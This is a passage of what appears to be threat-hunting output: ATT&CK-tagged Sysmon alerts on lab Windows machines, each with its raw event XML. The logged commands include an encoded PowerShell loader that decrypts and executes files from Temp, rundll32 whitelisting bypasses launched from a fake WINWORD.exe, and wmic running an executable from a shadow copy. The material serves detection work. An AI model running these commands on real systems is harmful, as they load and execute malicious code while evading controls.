<Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D8E5-5F8A-0000-0010E1BC7200</Data>
<Data Name=""ParentProcessId"">2920</Data>
<Data Name=""ParentImage"">C:\Users\IEUser\AppData\Roaming\WINWORD.exe</Data>
<Data Name=""ParentCommandLine"">C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1565785034.89393,2019-08-14T16:17:14.893930+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( &quot;C:\Windows\system32\rundll32.exe&quot; zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab})",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-14T12:17:14.614739Z"">
</TimeCreated>
<EventRecordID>10674</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2004"" ThreadID=""4480"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-14 12:17:14.447</Data>
<Data Name=""ProcessGuid"">747F3D96-FBCA-5D53-0000-0010B8664100</Data>
<Data Name=""ProcessId"">2476</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\rundll32.exe&quot; zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-F419-5D53-0000-002026910200</Data>
<Data Name=""LogonId"">0x29126</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-F41E-5D53-0000-001067C80300</Data>
<Data Name=""ParentProcessId"">4824</Data>
<Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1602935016.312645,2020-10-17T15:43:36.312645+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( &quot;C:\Windows\System32\rundll32.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-17T11:43:36.306601Z"">
</TimeCreated>
<EventRecordID>417079</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3500"" ThreadID=""4688"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-17 11:43:36.303</Data>
<Data Name=""ProcessGuid"">747F3D96-D8E8-5F8A-0000-00102CEF7200</Data>
<Data Name=""ProcessId"">840</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\AppData\Roaming\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-CA8D-5F8A-0000-0020D1090A00</Data>
<Data Name=""LogonId"">0xa09d1</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D8E5-5F8A-0000-0010E1BC7200</Data>
<Data Name=""ParentProcessId"">2920</Data>
<Data Name=""ParentImage"">C:\Users\IEUser\AppData\Roaming\WINWORD.exe</Data>
<Data Name=""ParentCommandLine"">C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1565785034.89393,2019-08-14T16:17:14.893930+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( &quot;C:\Windows\system32\rundll32.exe&quot; zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-14T12:17:14.614739Z"">
</TimeCreated>
<EventRecordID>10674</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2004"" ThreadID=""4480"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-14 12:17:14.447</Data>
<Data Name=""ProcessGuid"">747F3D96-FBCA-5D53-0000-0010B8664100</Data>
<Data Name=""ProcessId"">2476</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\rundll32.exe&quot; zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-F419-5D53-0000-002026910200</Data>
<Data Name=""LogonId"">0x29126</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-F41E-5D53-0000-001067C80300</Data>
<Data Name=""ParentProcessId"">4824</Data>
<Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920559.233522,2019-05-27T05:29:19.233522+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir &quot;Filename: redirection.config&quot; /text:userName ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:19.233522Z"">
</TimeCreated>
<EventRecordID>5952</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:19.183</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6F-5CEB-0000-001026B9FF00</Data>
<Data Name=""ProcessId"">1036</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir &quot;Filename: redirection.config&quot; /text:userName</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAd
ABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558969974.544664,2019-05-27T19:12:54.544664+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T15:12:54.447494Z"">
</TimeCreated>
<EventRecordID>6188</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""980"" ThreadID=""2220"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 15:12:54.428</Data>
<Data Name=""ProcessGuid"">365ABB72-FE76-5CEB-0000-0010546E0C00</Data>
<Data Name=""ProcessId"">2356</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-FD85-5CEB-0000-00104C0E0B00</Data>
<Data Name=""ParentProcessId"">1944</Data>
<Data Name=""ParentImage"">C:\Windows\System32\notepad.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\notepad.exe&quot;</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1602935016.312645,2020-10-17T15:43:36.312645+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( &quot;C:\Windows\System32\rundll32.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-17T11:43:36.306601Z"">
</TimeCreated>
<EventRecordID>417079</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3500"" ThreadID=""4688"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-17 11:43:36.303</Data>
<Data Name=""ProcessGuid"">747F3D96-D8E8-5F8A-0000-00102CEF7200</Data>
<Data Name=""ProcessId"">840</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\AppData\Roaming\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-CA8D-5F8A-0000-0020D1090A00</Data>
<Data Name=""LogonId"">0xa09d1</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D8E5-5F8A-0000-0010E1BC7200</Data>
<Data Name=""ParentProcessId"">2920</Data>
<Data Name=""ParentImage"">C:\Users\IEUser\AppData\Roaming\WINWORD.exe</Data>
<Data Name=""ParentCommandLine"">C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1565785034.89393,2019-08-14T16:17:14.893930+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( &quot;C:\Windows\system32\rundll32.exe&quot; zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-14T12:17:14.614739Z"">
</TimeCreated>
<EventRecordID>10674</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2004"" ThreadID=""4480"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-14 12:17:14.447</Data>
<Data Name=""ProcessGuid"">747F3D96-FBCA-5D53-0000-0010B8664100</Data>
<Data Name=""ProcessId"">2476</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\rundll32.exe&quot; zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-F419-5D53-0000-002026910200</Data>
<Data Name=""LogonId"">0x29126</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-F41E-5D53-0000-001067C80300</Data>
<Data Name=""ParentProcessId"">4824</Data>
<Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1557680510.781015,2019-05-12T21:01:50.781015+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T17:01:43.391862Z"">
</TimeCreated>
<EventRecordID>16496</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2012"" ThreadID=""300"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 17:01:31.380</Data>
<Data Name=""ProcessGuid"">365ABB72-516B-5CD8-0000-001087E41600</Data>
<Data Name=""ProcessId"">3788</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-4FB5-5CD8-0000-0020F2350100</Data>
<Data Name=""LogonId"">0x135f2</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-502E-5CD8-0000-00102A330700</Data>
<Data Name=""ParentProcessId"">3192</Data>
<Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1558969974.544664,2019-05-27T19:12:54.544664+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T15:12:54.447494Z"">
</TimeCreated>
<EventRecordID>6188</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""980"" ThreadID=""2220"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 15:12:54.428</Data>
